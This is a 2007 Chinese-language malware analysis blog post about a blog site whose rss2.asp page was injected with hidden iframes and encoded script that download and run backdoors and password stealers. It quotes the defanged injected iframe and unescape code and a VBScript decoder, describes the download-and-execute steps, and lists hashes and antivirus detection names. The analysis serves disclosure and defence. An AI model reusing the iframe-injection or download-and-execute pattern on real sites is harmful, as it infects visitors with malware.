03-31/某部落格網的rss2.asp力推5病毒（其中3個為灰鴿子）第3版

endurer 原創

2007-03-31 第3版 補充瑞星 的反應
2007-03-29 第2版 補充kaspersky 的反應
2007-03-29 第1版

該部落格網的rss2.asp包含代碼：
/---
＜SCRIPT＞var Words="%*3*Cht*ml%3E%3Ciframe src%3D%22hxxp%3A%2F%2Fkmx%2E**zl**f*j**j%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))＜/SCRIPT＞ ＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞
＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞
＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞
---/

變數Words的值解密後的內容為：
/---
＜html＞＜iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"＞＜/html＞
";document.write(unescape(Words))＜/SCRIPT＞ ＜SCRIPT＞var Words="＜html＞＜iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"＞＜/html＞
---/

hxxp://k***m**x*.z***l*f**j*j.com/index.htm包含代碼：
/---
＜iframe src="hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://k***m**x*.z***l*f**j*j.com/jb.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://www.z***l*f**j*j.com/321.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://www.z***l*f**j*j.com/123.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm中的指令碼代碼功能是用unescape()解碼字串值並輸出。

輸出內容為VBScript指令碼，功能是使用自訂函數：
/---
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
---/
解密變數t的值並執行。

解密後的變數t值為VBScript指令碼代碼，功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下載檔案 gz.exe，儲存為 %temp%/leren.bat，並利用Shell.Application 對象 Q 的 ShellExecute 方法來運行。

檔案說明符 : D:/test/gz.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-3-29 12:41:59
修改時間 : 2007-3-29 12:41:59
訪問時間 : 2007-3-29 0:0:0
大小 : 387584 位元組 378.512 KB
MD5 : 8b1e57e69f958e004fc743188e4f63c4

Kaspersky 報為 Backdoor.Win32.Hupigon.emk[KLAB-1900585]

 瑞星 報為 Backdoor.Gpigeon.sbi（病毒上報郵件分析結果－流水單號:6239851）

    我們將在較新的19.16.42版本(瑞星2006的18.72.42版本)中處理解決，請您屆時將您的瑞星軟體升級到19.16.42(瑞星2006的18.72.42版本)版本並且開啟監控中心全盤殺毒。如果我們在測試過程中發現問題的話，我們會延遲一到兩版本後升級。

hxxp://k***m**x*.z***l*f**j*j.com/jb.htm（卡巴報為：Trojan-Downloader.VBS.Small.dc）內容為VBScript指令碼代碼，功能是輸出資訊：“你好，您所訪問的頁面正在載入中...請稍候片刻....”，同時利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下載檔案 jb.exe，儲存為 %temp%/svchost.exe，並利用Shell.Application 對象 zhonghuae 的 ShellExecute 方法來運行。

檔案說明符 : D:/test/jb.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-3-29 12:39:38
修改時間 : 2007-3-29 12:39:40
訪問時間 : 2007-3-29 0:0:0
大小 : 5632 位元組 5.512 KB
MD5 : ee5a215b736b733ec2caed16fb413a29

Kaspersky 報為 Trojan.Win32.Agent.aic [KLAB-1900058]

 瑞星 報為 Trojan.Mnless.hpg（病毒上報郵件分析結果－流水單號:6239566）

hxxp://www.z***l*f**j*j.com/321.htm　內容為VBScript指令碼代碼，功能是輸出資訊：“你好，您所訪問的頁面正在載入中...請稍候片刻....”，同時利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下載檔案 321.exe，儲存為 %temp%/svchost.exe，並利用Shell.Application 對象 zhonghuae 的 ShellExecute 方法來運行。

檔案說明符 : D:/test/321.exe
屬性 : A---
語言 : 英語(美國)
檔案版本 : 5.2.3790.1830
說明 : Generic Host Process for Win32 Services
著作權 : (C) Microsoft Corporation. All rights reserved.
備忘 :
產品版本 : 5.2.3790.1830
產品名稱 : Microsoft(R) Windows(R) Operating System
公司名稱 : Microsoft Corporation
合法商標 :
內部名稱 : rpcs.exe
源檔案名稱 : rpcs.exe
建立時間 : 2007-3-29 12:39:38
修改時間 : 2007-3-29 12:41:12
訪問時間 : 2007-3-29 0:0:0
大小 : 109606 位元組 107.38 KB
MD5 : 9adeac121907c9ea7ad2b1dad7834bc6

Kaspersky 報為 Trojan-PSW.Win32.QQRob.km

瑞星 報為 Trojan.PSW.QQRobber.bkv（病毒上報郵件分析結果－流水單號:6239566）

hxxp://www.z***l*f**j*j.com/123.htm　內容為VBScript指令碼代碼，功能是輸出資訊：“你好，您所訪問的頁面正在載入中...請稍候片刻....”，同時利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下載檔案 123.exe，儲存為 %temp%/svchost.exe，並利用Shell.Application 對象 zhonghuae 的 ShellExecute 方法來運行。

檔案說明符 : D:/test/123.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-3-29 12:39:38
修改時間 : 2007-3-29 12:43:34
訪問時間 : 2007-3-29 0:0:0
大小 : 298121 位元組 291.137 KB
MD5 : b6b5bd850c28a1843fc5195fa09d52c7

Kaspersky 報為 Backdoor.Win32.Hupigon.crx[KLAB-1900585]

瑞星 報為 Trojan.Mnless.hpf（病毒上報郵件分析結果－流水單號:6239566）

hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm　（瑞星報為：Trojan.DL.VBS.Agent.clg）內容為JavaScript指令碼代碼，功能是用String.fromCharCode()解碼變數t的值並輸出。

解碼後的變數t的值為VBScript指令碼代碼，功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下載檔案 010.exe，儲存為 %temp%/svchost.exe，並利用Shell.Application 對象 Xe 的 ShellExecute 方法來運行。

檔案說明符 : d:/test/010.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-3-29 12:35:2
修改時間 : 2007-3-29 12:35:6
訪問時間 : 2007-3-29 0:0:0
大小 : 413184 位元組 403.512 KB
MD5 : 8181fd58e26227d57915fa25ce26234e 

Kaspersky 報為 Backdoor.Win32.Hupigon.avg[KLAB-1900585]

瑞星 報為 Backdoor.Gpigeon.sbg（病毒上報郵件分析結果－流水單號:6239423）